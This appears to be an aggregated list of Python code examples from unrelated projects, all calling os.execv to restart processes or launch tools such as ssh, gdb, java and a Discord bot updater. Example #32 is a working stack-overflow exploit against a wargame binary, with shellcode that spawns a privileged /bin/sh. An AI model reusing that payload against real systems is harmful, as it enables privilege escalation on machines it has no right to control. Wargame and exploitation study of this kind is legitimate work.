def restart(self):
    python = self.find_desired_python()
    sys.stderr.write('NOTE: %s switching to %s\n' %
                     (os.path.basename(sys.argv[0]), python))
    sys.argv.insert(0, '-u')
    sys.argv.insert(0, python)
    os.execv(sys.argv[0], sys.argv)
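
For reference, a minimal sketch of the same re-exec pattern, assuming find_desired_python() returns an absolute interpreter path (the path below is a hypothetical stand-in):

import os, sys

python = "/usr/bin/python3"        # stand-in for self.find_desired_python()
argv = [python, "-u"] + sys.argv   # re-run the original script unbuffered
os.execv(argv[0], argv)            # replaces the current process; never returns on success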
Example #2
    def step_1_end(self):
        # END OF Step 1 in Upgrade
        self.log("STEP 1 COMPLETED", "GUI")
        self.ps.progress.setFormat(_("Step 1 Completed"))

        # STEP 1 Finishes at 10 percent
        self.ps.progress.setValue(10)

        # Write selected upgrade repository to a temporary file
        try:
            file('/tmp/target_repo','w').write(self.target_repo)
        except:
            self.log("TARGET REPO STORE FAILED, USING stable AS DEFAULT", "GUI")

        # Mark the step
        self.logger.markStep(2)

        # Cleanup Pisi DB
        cleanup_pisi()

        # Just wait a little bit.
        time.sleep(2)

        # Re-launch the um for 2. step
        os.execv('/usr/bin/upgrade-manager', ['/usr/bin/upgrade-manager', '--start-from-step2'])
Example #3
    def method_exec(self, space, args_w):
        if len(args_w) > 1 and space.respond_to(args_w[0], space.newsymbol("to_hash")):
            raise space.error(space.w_NotImplementedError, "exec with environment")

        if len(args_w) > 1 and space.respond_to(args_w[-1], space.newsymbol("to_hash")):
            raise space.error(space.w_NotImplementedError, "exec with options")

        if space.respond_to(args_w[0], space.newsymbol("to_ary")):
            w_cmd = space.convert_type(args_w[0], space.w_array, "to_ary")
            cmd, argv0 = [
                space.str0_w(space.convert_type(w_e, space.w_string, "to_str")) for w_e in space.listview(w_cmd)
            ]
        else:
            w_cmd = space.convert_type(args_w[0], space.w_string, "to_str")
            cmd = space.str0_w(w_cmd)
            argv0 = None

        if len(args_w) > 1 or argv0 is not None:
            if argv0 is None:
                sepidx = cmd.rfind(os.sep) + 1
                if sepidx > 0:
                    argv0 = cmd[sepidx:]
                else:
                    argv0 = cmd
            args = [argv0]
            args += [space.str0_w(space.convert_type(w_arg, space.w_string, "to_str")) for w_arg in args_w[1:]]
            os.execv(cmd, args)
        else:
            shell = os.environ.get("RUBYSHELL") or os.environ.get("COMSPEC") or "/bin/sh"
            sepidx = shell.rfind(os.sep) + 1
            if sepidx > 0:
                argv0 = shell[sepidx:]
            else:
                argv0 = shell
            os.execv(shell, [argv0, "-c", cmd])
Example #4
    def from_introspection(self):
        """ Initialise the configuration by introspecting the system. """

        from PyQt4 import QtCore

        inform("PyQt %s is being used." % QtCore.PYQT_VERSION_STR)
        inform("Qt %s is being used." % QtCore.QT_VERSION_STR)

        # See if we have a PyQt4 that embeds its configuration.
        try:
            pyqt_config = QtCore.PYQT_CONFIGURATION
        except AttributeError:
            pyqt_config = None

        # FIXME: During development.
        pyqt_config = dict(sip_flags='-x VendorID -t WS_MACX -x PyQt_NoPrintRangeBug -t Qt_4_8_3')

        if pyqt_config is None:
            # Fallback to the old configuration script.
            # FIXME: When the scripts are renamed.
            config_script = sys.argv[0].replace('configure-ng', 'configure')
            args = [sys.executable, config_script] + sys.argv[1:]

            try:
                os.execv(sys.executable, args)
            except OSError:
                pass

            error("Unable to execute '%s'\n" % config_script)

        self.pyqt_sip_flags = pyqt_config['sip_flags']
Example #5
    def _connect_stack(self, stack_id, connector_id):
        # Get the IP and default user information for this connector.
        payload = {"uuid": stack_id}
        try:
            res = requests.get(self.ferry_server + "/stack", params=payload)
            json_value = json.loads(str(res.text))
        except ConnectionError:
            logging.error("could not connect to ferry server")
            return "It appears Ferry servers are not running.\nType sudo ferry server and try again."

        connector_ip = None
        for cg in json_value["connectors"]:
            if not connector_id:
                connector_ip = cg["entry"]["ip"]
                break
            elif connector_id == cg["uniq"]:
                connector_ip = cg["entry"]["ip"]
                break
            else:
                logging.warning("no match: %s %s" % (connector_id, cg["uniq"]))

        # Now form the ssh command. This just executes in the same shell.
        if connector_ip:
            key_opt = "-o StrictHostKeyChecking=no"
            host_opt = "-o UserKnownHostsFile=/dev/null"
            ident = "-i %s/id_rsa" % self._read_key_dir()
            dest = "%s@%s" % (self.default_user, connector_ip)
            cmd = "ssh %s %s %s %s" % (key_opt, host_opt, ident, dest)
            logging.warning(cmd)
            os.execv("/usr/bin/ssh", cmd.split())
Example #6
def _reload():
    global _reload_attempted
    _reload_attempted = True
    for fn in _reload_hooks:
        fn()
    if hasattr(signal, "setitimer"):
        # Clear the alarm signal set by
        # ioloop.set_blocking_log_threshold so it doesn't fire
        # after the exec.
        signal.setitimer(signal.ITIMER_REAL, 0, 0)
    if sys.platform == 'win32':
        # os.execv is broken on Windows and can't properly parse command line
        # arguments and executable name if they contain whitespaces. subprocess
        # fixes that behavior.
        subprocess.Popen([sys.executable] + sys.argv)
        sys.exit(0)
    else:
        try:
            os.execv(sys.executable, [sys.executable] + sys.argv)
        except OSError:
            # Mac OS X versions prior to 10.6 do not support execv in
            # a process that contains multiple threads.  Instead of
            # re-executing in the current process, start a new one
            # and cause the current process to exit.  This isn't
            # ideal since the new process is detached from the parent
            # terminal and thus cannot easily be killed with ctrl-C,
            # but it's better than not being able to autoreload at
            # all.
            # Unfortunately the errno returned in this case does not
            # appear to be consistent, so we can't easily check for
            # this error specifically.
            os.spawnv(os.P_NOWAIT, sys.executable,
                      [sys.executable] + sys.argv)
            sys.exit(0)
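
The _reload_hooks list iterated above lets cleanup run before the process image is replaced. A hypothetical registration sketch (the hook below is illustrative; some autoreload modules expose a dedicated helper instead of touching the list directly):

def _close_connections_before_restart():
    # flush logs / close sockets so nothing is lost across the exec
    pass

_reload_hooks.append(_close_connections_before_restart)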
Example #7
def server_start(myid):
    """
    Start the zookeeper server

    @param myid - the id of the zookeeper server in the ensemble
    """
    install_dir = os.environ.get('INSTALLDIR')

    classpath = ':'.join([
        "/etc/zookeeper",
        "/usr/share/java/slf4j/slf4j-log4j12.jar",
        "/usr/share/java/slf4j/slf4j-api.jar",
        "/usr/share/java/netty.jar",
        "/usr/share/java/log4j.jar",
        "/usr/share/java/jline.jar",
        "/usr/share/java/zookeeper/zookeeper.jar"])

    log4j_path = os.path.join("%s/etc/zookeeper/" % (install_dir), "log4j-%d.properties" % (myid,))
    import socket
    with open(log4j_path, "w") as log4j:
            log4j.write("""
# DEFAULT: console appender only
log4j.rootLogger=INFO, ZLOG
log4j.appender.ZLOG.layout=org.apache.log4j.PatternLayout
log4j.appender.ZLOG.layout.ConversionPattern=%d{ISO8601} [""" + socket.getfqdn()  +"""] - %-5p [%t:%C{1}@%L] - %m%n
log4j.appender.ZLOG=org.apache.log4j.RollingFileAppender
log4j.appender.ZLOG.Threshold=DEBUG
log4j.appender.ZLOG.File=""" + to_java_compatible_path(  # NOQA
                "%s/zk/server-%d/log" % (install_dir, myid) + os.sep + "zookeeper.log\n"))


    argv = [
        '/usr/bin/java',
        '-cp',
        classpath,
        #'-Dlog4j.debug',
        '-Dzookeeper.log.dir="%s"' % (install_dir,),
        '-Dlog4j.configuration=file:%s' % log4j_path,
        '-Dcom.sun.management.jmxremote',
        '-Dcom.sun.management.jmxremote.local.only=false',
        'org.apache.zookeeper.server.quorum.QuorumPeerMain',
        '%s/etc/zookeeper/server-%d.cfg' % (install_dir, myid),
    ]

    print('Running zookeeper: %s' %  (' '.join(argv),))

    pid = os.fork()
    if pid < 0:
        raise OSError("Failed to fork")
    elif pid == 0:
        # instruct the child process to TERM when the parent dies
        import ctypes
        libc = ctypes.CDLL('/lib64/libc.so.6')
        PR_SET_PDEATHSIG = 1; TERM = 15
        libc.prctl(PR_SET_PDEATHSIG, TERM)

        os.execv(argv[0], argv)

        # Should never reach here CRASH
        raise OSError("execv() failed")
Example #8
def _Main(argv):
  opt = optparse.OptionParser(usage="repo wrapperinfo -- ...")
  opt.add_option("--repo-dir", dest="repodir",
                 help="path to .repo/")
  opt.add_option("--wrapper-version", dest="wrapper_version",
                 help="version of the wrapper script")
  opt.add_option("--wrapper-path", dest="wrapper_path",
                 help="location of the wrapper script")
  _PruneOptions(argv, opt)
  opt, argv = opt.parse_args(argv)

  _CheckWrapperVersion(opt.wrapper_version, opt.wrapper_path)
  _CheckRepoDir(opt.repodir)

  repo = _Repo(opt.repodir)
  try:
    try:
      repo._Run(argv)
    finally:
      close_ssh()
  except KeyboardInterrupt:
    sys.exit(1)
  except RepoChangedException, rce:
    # If repo changed, re-exec ourselves.
    #
    argv = list(sys.argv)
    argv.extend(rce.extra_args)
    try:
      os.execv(__file__, argv)
    except OSError, e:
      print >>sys.stderr, 'fatal: cannot restart repo after upgrade'
      print >>sys.stderr, 'fatal: %s' % e
      sys.exit(128)
Example #9
async def on_message(message):
	if client.sleeping:
		if message.content == '!wake':
			client.sleeping = False
			await client.send_message(message.channel, 'SolBot online!')
	else:
		if message.content == '!sleep':
			client.sleeping = True
			await client.send_message(message.channel, 'Going to sleep...')
		elif message.content == '!update':
			g = Git(os.path.dirname(os.path.abspath(__file__)))
			tmp = await client.send_message(message.channel, 'Pulling new code...')
			g.pull()
			await client.edit_message(tmp, 'Code pulled. Restarting...')
			client.logout()
			os.execv(sys.executable, ['python3.5'] + sys.argv)
		elif message.content == '!gitstatus':
			g = Git(os.path.dirname(os.path.abspath(__file__)))
			tmp = await client.send_message(message.channel, 'Checking status...')
			g.fetch()
			p = re.compile('Your branch is.*by (\d+) commits.*')
			m = p.match(g.status())
			if m:
				await client.edit_message(tmp, 'I am behind by {} commits'.format(m.group(1)))
			else:
				await client.edit_message(tmp, 'I am up to date!')
Example #10
def resolve_deps(repodir, level=0, self_update=True, overrideroots=None, skipdependencies=set()):
    config = read_deps(repodir)
    if config is None:
        if level == 0:
            logging.warning('No dependencies file in directory %s, nothing to do...\n%s' % (repodir, USAGE))
        return
    if level >= 10:
        logging.warning('Too much subrepository nesting, ignoring %s' % repodir)
        return

    if overrideroots is not None:
        config['_root'] = overrideroots

    for dir, sources in sorted(config.iteritems()):
        if (dir.startswith('_') or
            skipdependencies.intersection([s[0] for s in sources if s[0]])):
            continue

        target = safe_join(repodir, dir)
        parenttype = get_repo_type(repodir)
        _root = config.get('_root', {})

        for key in sources.keys() + _root.keys():
            if key == parenttype or key is None and vcs != '*':
                vcs = key
        source, rev = merge_seqs(sources.get('*'), sources.get(vcs))

        if not (vcs and source and rev):
            logging.warning('No valid source / revision found to create %s' % target)
            continue

        ensure_repo(repodir, parenttype, target, vcs, _root.get(vcs, ''), source)
        update_repo(target, vcs, rev)
        resolve_deps(target, level + 1, self_update=False,
                     overrideroots=overrideroots, skipdependencies=skipdependencies)

    if self_update and '_self' in config and '*' in config['_self']:
        source = safe_join(repodir, config['_self']['*'])
        try:
            with io.open(source, 'rb') as handle:
                sourcedata = handle.read()
        except IOError as e:
            if e.errno != errno.ENOENT:
                raise
            logging.warning("File %s doesn't exist, skipping self-update" % source)
            return

        target = __file__
        with io.open(target, 'rb') as handle:
            targetdata = handle.read()

        if sourcedata != targetdata:
            logging.info("Updating %s from %s, don't forget to commit" % (target, source))
            with io.open(target, 'wb') as handle:
                handle.write(sourcedata)
            if __name__ == '__main__':
                logging.info('Restarting %s' % target)
                os.execv(sys.executable, [sys.executable, target] + sys.argv[1:])
            else:
                logging.warning('Cannot restart %s automatically, please rerun' % target)
Example #11
def main():
    SPARK_HOME = getSparkHome()

    sparkSubmit = os.path.join(SPARK_HOME, 'bin', 'pyspark')

    # add python script
    os.environ['PYTHONSTARTUP'] = os.path.join(os.path.dirname(os.path.realpath(ts2.__file__)), 'util', 'launch.py')

    # add ETL configuration
    os.environ['ETL_CONFIG'] = sys.argv[1]

    thunderStreamingJar = findThunderStreamingJar()
    #hbaseJars = findHBaseJars()
    #otherJars = findOtherJars()
	
    #jarList = thunderStreamingJar + hbaseJars + otherJars
    jarList = thunderStreamingJar

    jars = ['--jars', ','.join(jarList)]
    driver_classpath = ['--driver-class-path', ':'.join(jarList)]

    retvals = []
    retvals.extend(jars)
    retvals.extend(driver_classpath)

    print "retvals: %s" % str(retvals) 

    os.execv(sparkSubmit, retvals)
Example #12
def _RunGdb(device, package_name, debug_process_name, pid, output_directory,
            target_cpu, extra_args, verbose):
  if not pid:
    debug_process_name = _NormalizeProcessName(debug_process_name, package_name)
    pid = device.GetApplicationPids(debug_process_name, at_most_one=True)
  if not pid:
    logging.warning('App not running. Sending launch intent.')
    _LaunchUrl([device], package_name)
    pid = device.GetApplicationPids(debug_process_name, at_most_one=True)
    if not pid:
      raise Exception('Unable to find process "%s"' % debug_process_name)

  gdb_script_path = os.path.dirname(__file__) + '/adb_gdb'
  cmd = [
      gdb_script_path,
      '--package-name=%s' % package_name,
      '--output-directory=%s' % output_directory,
      '--adb=%s' % adb_wrapper.AdbWrapper.GetAdbPath(),
      '--device=%s' % device.serial,
      '--pid=%s' % pid,
      # Use one lib dir per device so that changing between devices does not
      # require refetching the device libs.
      '--pull-libs-dir=/tmp/adb-gdb-libs-%s' % device.serial,
  ]
  # Enable verbose output of adb_gdb if it's set for this script.
  if verbose:
    cmd.append('--verbose')
  if target_cpu:
    cmd.append('--target-arch=%s' % _TargetCpuToTargetArch(target_cpu))
  cmd.extend(extra_args)
  logging.warning('Running: %s', ' '.join(pipes.quote(x) for x in cmd))
  print _Colorize(
      'All subsequent output is from adb_gdb script.', colorama.Fore.YELLOW)
  os.execv(gdb_script_path, cmd)
Example #13
def main():
    args = parse_args()

    program = args.program
    if not os.path.isabs(program):
        # program uses a relative path: try to find the absolute path
        # to the executable
        if sys.version_info >= (3, 3):
            import shutil
            program_abs = shutil.which(program)
        else:
            import distutils.spawn
            program_abs = distutils.spawn.find_executable(program)
        if program_abs:
            program = program_abs

    for arg_name, rlimit in RESOURCES:
        value = getattr(args, arg_name)
        if value is None:
            continue
        try:
            resource.setrlimit(rlimit, (value, value))
        except ValueError as exc:
            print("%s: failed to set the %s resource limit: %s"
                  % (USAGE_PROGRAM, arg_name.upper(), exc),
                  file=sys.stderr)
            sys.exit(1)

    try:
        os.execv(program, [program] + args.program_args)
    except Exception as exc:
        print("%s: failed to execute %s: %s"
              % (USAGE_PROGRAM, program, exc),
              file=sys.stderr)
        sys.exit(1)
Example #14
	def start(self):
		assert self.pid is None
		def pipeOpen():
			readend,writeend = os.pipe()
			readend = os.fdopen(readend, "r")
			writeend = os.fdopen(writeend, "w")
			return readend,writeend
		self.pipe_c2p = pipeOpen()
		self.pipe_p2c = pipeOpen()
		pid = os.fork()
		if pid == 0: # child
			self.pipe_c2p[0].close()
			self.pipe_p2c[1].close()
			# Copying all parameters is problematic (e.g. --pyshell).
			# sys.argv[0] is never "python", so it might be problematic
			# if it is not executable. However, it should be.
			args = sys.argv[0:1] + [
				"--forkExecProc",
				str(self.pipe_c2p[1].fileno()),
				str(self.pipe_p2c[0].fileno())]
			os.execv(args[0], args)
		else: # parent
			self.pipe_c2p[1].close()
			self.pipe_p2c[0].close()
			self.pid = pid
			self.pickler = Pickler(self.pipe_p2c[1])
			self.pickler.dump(self.name)
			self.pickler.dump(self.target)
			self.pickler.dump(self.args)
			self.pipe_p2c[1].flush()
Example #15
 def restart(self):
     if self.connected:
         self.quit("Restarting.")
     else:
         self.save_config()
         self.state.close()
     os.execv(sys.executable, [sys.executable] + sys.argv)
Example #16
def background(cmdline, exit_callback=None):
    """
	Fork and execute a process specified by cmdline.  If successful, this 
	returns the pid of the newly spawned process.  If specified, bind a 
	callback to execute when the process exits.
	"""
    global handler_init
    global running_pids
    if not handler_init:
        init_sigchld_handler()
    pid = os.fork()
    if pid:
        if exit_callback:
            exit_callbacks[pid] = exit_callback
        running_pids[pid] = True
        return pid

    close_stdout_stderr()

    if type(cmdline) == type([]):
        args = cmdline
    else:
        args = cmdline.split()
    os.execv(args[0], args)
    # should never happen
    assert False, "exec failed"
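
A hypothetical usage sketch for background(), assuming the module above is importable and that the exit callback receives the child's pid (the callback signature is an assumption):

def on_child_exit(pid):
    print("child %d finished" % pid)

child = background(["/bin/sleep", "2"], exit_callback=on_child_exit)
print("spawned pid %d; parent keeps running" % child)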
Example #17
 def loop(t, f):
     if f():
         reactor.callLater(t, loop, t, f)
     else:
         logger.info("Reloading...")
         reactor.stop()
         os.execv(sys.argv[0], sys.argv)
Example #18
def run_as_root(args, stdin=None):
    if stdin is not None:
        pipe_r, pipe_w = os.pipe()
    else:
        pipe_r, pipe_w = None, None

    pid = os.fork()
    if pid == 0:
        if pipe_r is not None:
            # setup stdin pipe
            os.dup2(pipe_r, 0)
            os.close(pipe_r)
            os.close(pipe_w)

        os.seteuid(0)
        os.setuid(0)
        try:
            os.execv(args[0], args)
        except:
            os._exit(127)
    else:
        if pipe_r is not None:
            os.close(pipe_r)
            os.write(pipe_w, stdin)
            os.close(pipe_w)
        wpid, sts = os.waitpid(pid, 0)
        code = sts_result(sts)
        if code != 0:
            raise MyException("%r: exited with result %d"% (args, code))
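
A hypothetical usage sketch, assuming the process already holds the privileges needed for os.seteuid(0) and that MyException / sts_result are defined as above:

run_as_root(["/usr/bin/id"])                                   # no stdin
run_as_root(["/usr/bin/tee", "/root/note.txt"], stdin="hi\n")  # data piped to the child's stdin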
Example #19
    def update_callback(msg):
        # executes in logic thread
        # well, intended to be
        # ui and logic now run in the same thread.

        from options import options
        if msg == 'up2date':
            ui_schedule(sss.switch)
        elif msg == 'update_disabled' and options.fastjoin:
            import gevent
            def func():
                from client.ui.soundmgr import SoundManager
                SoundManager.mute()
                gevent.sleep(0.3)
                ui_schedule(sss.switch)
                gevent.sleep(0.3)
                Executive.call('connect_server', ui_message, ('127.0.0.1', 9999), ui_message)
                gevent.sleep(0.3)
                Executive.call('auth', ui_message, ['Proton1', 'abcde'])
                gevent.sleep(0.3)
                Executive.call('quick_start_game', ui_message, 'THBattle')
                gevent.sleep(0.3)
                Executive.call('get_ready', ui_message, [])

            gevent.spawn(func)
                
        elif msg in errmsgs:
            ui_schedule(display_box, errmsgs[msg])
        else:
            os.execv(sys.executable, [sys.executable] + sys.argv)
Example #20
def main(regrtest_args):
    args = [sys.executable,
            '-W', 'default',      # Warnings set to 'default'
            '-bb',                # Warnings about bytes/bytearray
            '-E',                 # Ignore environment variables
            ]
    # Allow user-specified interpreter options to override our defaults.
    args.extend(test.support.args_from_interpreter_flags())

    # Workaround for issue #20355
    os.environ.pop("PYTHONWARNINGS", None)
    # Workaround for issue #20361
    args.extend(['-W', 'error::BytesWarning'])

    args.extend(['-m', 'test',    # Run the test suite
                 '-r',            # Randomize test order
                 '-w',            # Re-run failed tests in verbose mode
                 ])
    if sys.platform == 'win32':
        args.append('-n')         # Silence alerts under Windows
    if threading and not any(is_multiprocess_flag(arg) for arg in regrtest_args):
        args.extend(['-j', '0'])  # Use all CPU cores
    if not any(is_resource_use_flag(arg) for arg in regrtest_args):
        args.extend(['-u', 'all,-largefile,-audio,-gui'])
    args.extend(regrtest_args)
    print(' '.join(args))
    os.execv(sys.executable, args)
Example #21
def invoke_gcc_arm_embedded(args):
  os_name = utils.GuessOS()
  if os_name == "macos":
    os_name = "mac"
    # There is no way of disabling the passing of '-arch x86_64' from the
    # files generated by gyp on Mac.
    args.remove("-arch")
    args.remove("x86_64")
    # There is no way of disabling the passing of '-mpascal-strings' from the
    # files generated by gyp on Mac.
    if "-mpascal-strings" in args:
      args.remove("-mpascal-strings")

  gcc_arm_embedded_bin = relative_to_dartino_root(
    "third_party", "gcc-arm-embedded", os_name, "gcc-arm-embedded", "bin",
    "arm-none-eabi-gcc")
  if not os.path.exists(gcc_arm_embedded_bin):
    gcc_arm_embedded_download = relative_to_dartino_root(
      "third_party", "gcc-arm-embedded", "download")
    print "\n*************** TOOLCHAIN ERROR ********************"
    print "%s not found" % gcc_arm_embedded_bin
    print "Run %s to download\n" % gcc_arm_embedded_download
    exit(1)
  args.insert(0, gcc_arm_embedded_bin)
  os.execv(gcc_arm_embedded_bin, args)
Example #22
 def start(self, command):
     if self.using_pty:
         if pty is None: # Encountered ImportError
             sys.exit("You indicated pty=True, but your platform doesn't support the 'pty' module!") # noqa
         self.pid, self.parent_fd = pty.fork()
         # If we're the child process, load up the actual command in a
         # shell, just as subprocess does; this replaces our process - whose
         # pipes are all hooked up to the PTY - with the "real" one.
         if self.pid == 0:
             # Use execv for bare-minimum "exec w/ variable # args"
             # behavior. No need for the 'p' (use PATH to find executable)
             # or 'e' (define a custom/overridden shell env) variants, for
             # now.
             # TODO: use /bin/sh or whatever subprocess does. Only using
             # bash for now because that's what we have been testing
             # against.
             # TODO: also see if subprocess is using equivalent of execvp...
             # TODO: both pty.spawn() and pexpect.spawn() do a lot of
             # setup/teardown involving tty.*, setwinsize, getrlimit,
             # signal. Ostensibly we'll want some of that eventually, but if
             # possible write tests - integration-level if necessary -
             # before adding it!
             os.execv('/bin/bash', ['/bin/bash', '-c', command])
     else:
         self.process = Popen(
             command,
             shell=True,
             stdout=PIPE,
             stderr=PIPE,
         )
Example #23
def mysql(site=None):
	import webnotes 
	import commands, os
	msq = commands.getoutput('which mysql')
	webnotes.init(site=site)
	os.execv(msq, [msq, '-u', webnotes.conf.db_name, '-p'+webnotes.conf.db_password, webnotes.conf.db_name, '-h', webnotes.conf.db_host or "localhost", "-A"])
	webnotes.destroy()
Example #24
def restart(l, b, i):
    """
    !d Restart $nick$
    !a [message...]
    !r administrator
    """
    if i.args is None:
        quotes = [
            '(Terminator voice) I\'ll be back.',
            'I\'ll be back in a jiffy!',
            'brb',
            'I\'ll be right back, homies',
            ]
        choice = random.randint(1, len(quotes)) - 1
        b.l_say(BOLD+quotes[choice], i, 3)
    else:
        b.say(' '.join(i.args).capitalize(), channel='all')
    b.exit()
    print '\n' * 5

    args = sys.argv[:]
    args.insert(0, sys.executable)
    if sys.platform == 'win32':
        args = ['"%s"' % arg for arg in args]
    os.execv(sys.executable, args)
Example #25
 def restart(self):
     reactor.disconnectAll()
     import sys
     import os
     argv = [ sys.executable ]
     argv.extend(sys.argv)
     os.execv(sys.executable, argv)
Example #26
def restart():
    """ Restarts the game with original command line arguments. Those may over-
    write options set at Options Screen. This is by design"""
    executable = sys.executable
    args = list(sys.argv)
    args.insert(0, executable)
    os.execv(executable, args)
Example #27
	def start(self):
		assert self.pid is None
		def pipeOpen():
			readend,writeend = os.pipe()
			readend = os.fdopen(readend, "r")
			writeend = os.fdopen(writeend, "w")
			return readend,writeend
		self.pipe_c2p = pipeOpen()
		self.pipe_p2c = pipeOpen()
		pid = os.fork()
		if pid == 0: # child
			self.pipe_c2p[0].close()
			self.pipe_p2c[1].close()
			args = sys.argv + [
				"--forkExecProc",
				str(self.pipe_c2p[1].fileno()),
				str(self.pipe_p2c[0].fileno())]
			os.execv(args[0], args)
		else: # parent
			self.pipe_c2p[1].close()
			self.pipe_p2c[0].close()
			self.pid = pid
			self.pickler = Pickler(self.pipe_p2c[1])
			self.pickler.dump(self.name)
			self.pickler.dump(self.target)
			self.pickler.dump(self.args)
			self.pipe_p2c[1].flush()
Example #28
def startNewTripGPS(whichTrip):
	##Need to halt myGpsPipe, then move "CURRENT.txt" into the current trip we are working on.
	#First must stop GPS pipe process
	p= subprocess.Popen(['ps','-A'],stdout=subprocess.PIPE)
	out,err=p.communicate()

	for line in out.splitlines():
		if 'myGpsPipe' in line:
			pid=int(line.strip().split(' ')[0])
			print 'myGpsPipe on pid='+str(pid)+',should kill'
			os.kill(pid,9)			#command is "kill -9 pid"
	
	#Process is killed, need to call nmeaLocation.py to parse for time,date,locations.
	os.system('/home/root/Documents/beagle-bone.git/NMEA/nmeaLocation.py')
	#Waits for return, then we can move the CURRENT.txt into the trip folder we want.
	mvCommand='mv '+boneGPSpath+'PARSED.txt '+boneGPSpath+str(whichTrip)+'.txt'
	rmCommand='rm '+boneGPSpath+'CURRENT.txt'
	os.system(mvCommand)
	os.system(rmCommand)
	filep=boneGPSpath+'.info'
	OF=open(filep,'w')
	OF.write(str(whichTrip))		#Which trip actually represents how many trips are there.
	OF.close()						

	#Restart myGpsPipe script.
	pid=os.fork()
	if pid==0:
		os.setpgid(0,0)
		args=['/home/root/Documents/beagle-bone.git/NMEA/myGpsPipe.py','']
		os.execv(args[0],args)
Example #29
def runIt():
    global childPid

    ws = nws.client.NetWorkSpace(key, serverHost=nwssHost, serverPort=int(nwssPort))
    LogI('Opened workspace %s on %s at %s.'%(key, nwssHost, nwssPort))

    jobTag = 'job %s'%jobIndex
    cmd = ws.fetch(jobTag)
    LogI('Fetched job: %s.'%cmd)
    try:    ws.deleteVar(jobTag)
    except: pass

    startTime = time.time()

    ecmd = ['/bin/bash', '-c', cmd]
    childPid = os.fork()
    if childPid == 0:
        # Create a new process group to simplify killing the child and its descendants.
        os.setpgrp()
        os.execv(ecmd[0], ecmd)

    LogI('Child %d started on %s at %f.'%(childPid, myHost, startTime))
    childExistsLock.release()

    while 1:
        (retpid, retval) = os.waitpid(childPid, 0)
        if retpid: break

    LogI('Child %d returned on %d.'%(childPid, retval))
    childExitedLock.release()
    ws.store('Job %s Status'%jobIndex, (retval, startTime, time.time(), 0, childPid, myHost))
    ws.store('shut down %s'%jobIndex, 0) # let the sentinel know that the child is done.
        
    runItDoneLock.release()
Example #30
def exec_python(args):
  """Executes a python process, replacing the current process if possible.

  On Windows, it returns the child process code. The caller must exit at the
  earliest opportunity.
  """
  cmd = [sys.executable] + args
  if sys.platform not in ('cygwin', 'win32'):
    os.execv(cmd[0], cmd)
    return 1

  try:
    # On Windows, we cannot sanely exec() so shell out the child process
    # instead. But we need to forward any signal received that the bot may care
    # about. This means processes accumulate, sadly.
    # TODO(maruel): If stdin closes, it tells the child process that the parent
    # process died.
    proc = subprocess42.Popen(cmd, detached=True, stdin=subprocess42.PIPE)
    def handler(sig, _):
      logging.info('Got signal %s', sig)
      # Always send SIGTERM, which is properly translated.
      proc.send_signal(signal.SIGTERM)

    sig = signal.SIGBREAK if sys.platform == 'win32' else signal.SIGTERM
    with subprocess42.set_signal_handler([sig], handler):
      proc.wait()
      return proc.returncode
  except Exception as e:
    logging.exception('failed to start: %s', e)
    # Swallow the exception.
    return 1
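
A hypothetical caller sketch: on POSIX the call below never returns because the process is replaced, while on Windows it returns the child's exit code, which should be propagated as soon as possible:

sys.exit(exec_python(['-c', 'print("re-exec works")']))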
Example #31
def python(*args):
    os.execv(sys.executable, (sys.executable,) + args)
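
For example (hypothetical call), the helper above would replace the current process with a module run under the same interpreter:

python('-m', 'http.server', '8000')   # never returns on success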
Example #32
import os
import struct

payload = ""
sfp = 0x804851e
shell = "\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\x31\xc0\xb0\x0b\xcd\x80"
target = "/home/giant/assassin"
ret = 0xbffffbd4

def append(x):
    return payload + x

def p(x):
    return struct.pack("<L", x)

payload = append("\x90" * 44)
payload = append(p(sfp)) #ret
payload = append(p(ret))
payload = append("\x90"*100 + shell)

pid = os.fork()

if pid == 0:
    os.execv(target, (target, payload))
else:
    os.waitpid(pid, 0)
Example #33
def start():
    program = get_process_manager()
    if not program:
        raise Exception("No process manager found")
    os.execv(program, [program, 'start'])
Example #34
    if prognam == 'synctool_launch.py':
        print 'This program is used as a launcher for synctool'
        sys.exit(0)

    if prognam not in LAUNCH:
        stderr("launch: error: unknown program '%s'" % prognam)
        sys.exit(1)

    (prefix, bindir) = os.path.split(base)
    launch = os.path.join(prefix, 'sbin', LAUNCH[prognam])
    if not os.path.isfile(launch):
        stderr('launch: error: missing program %s' % launch)
        sys.exit(-1)

    libdir = os.path.join(prefix, 'lib')
    if not os.path.isdir(libdir):
        stderr('launch: error: no such directory: %s' % libdir)
        sys.exit(-1)

    os.environ['PYTHONPATH'] = libdir

    argv = sys.argv[1:]
    argv.insert(0, launch)

    os.execv(argv[0], argv)

    stderr('launch: error: failed to execute: %s' % argv[0])
    sys.exit(-1)

# EOB
Example #35
        os.chdir('/')

        # the child process gets the desired uid/gid
        os.setgid(run_as_gid)
        groups=[g.gr_gid for g in grp.getgrall() if username in g.gr_mem or username in g.gr_name]
        os.setgroups(groups)
        os.setuid(uid)

        # give this its own process group (which happens to be equal to its
        # pid)
        os.setpgrp()

        # Finally, exec the script
        try:
            oumask = os.umask(022)
            os.execv(script_path, [script_path, ])
            os.umask(oumask)
        finally:
            # Shouldn't reach this part - execv never returns
            os._exit(1)

    # Parent doesn't write to child, so close that part
    os.close(pipe_write)

    output = None
    timed_out = None

    out_stream = tempfile.TemporaryFile()

    while 1:
        select_wait = None
Example #36
        mod,
        "--permutations",
        permutations,
        "--method",
        method,
        "--zscore",
        zscore,
        "--pval",
        pval,
        "--num",
        num,
        "--input",
        os.path.join(here, "input_list"),
        "--denom",
        os.path.join(here, "denominator"),
        "--output",
        here,
        "--version",
        version,
        "--dataToAnalyze",
        dataToAnalyze,
    ]
    os.chdir(there)
    os.execv(args[0], args)
except os.error, e:
    print "Operating system error: %s" % str(e)
    raise SystemExit, 1

f.write("\n")
f.close()
Example #37
#!/usr/bin/env python

# Add phonelibs openblas to LD_LIBRARY_PATH if import fails
from common.basedir import BASEDIR
try:
    from scipy import spatial
except ImportError as e:
    import os
    import sys

    openblas_path = os.path.join(BASEDIR, "phonelibs/openblas/")
    os.environ['LD_LIBRARY_PATH'] += ':' + openblas_path

    args = [sys.executable]
    args.extend(sys.argv)
    os.execv(sys.executable, args)

DEFAULT_SPEEDS_BY_REGION_JSON_FILE = BASEDIR + "/selfdrive/mapd/default_speeds_by_region.json"
import default_speeds_generator
default_speeds_generator.main(DEFAULT_SPEEDS_BY_REGION_JSON_FILE)

import os
import sys
import time
import zmq
import threading
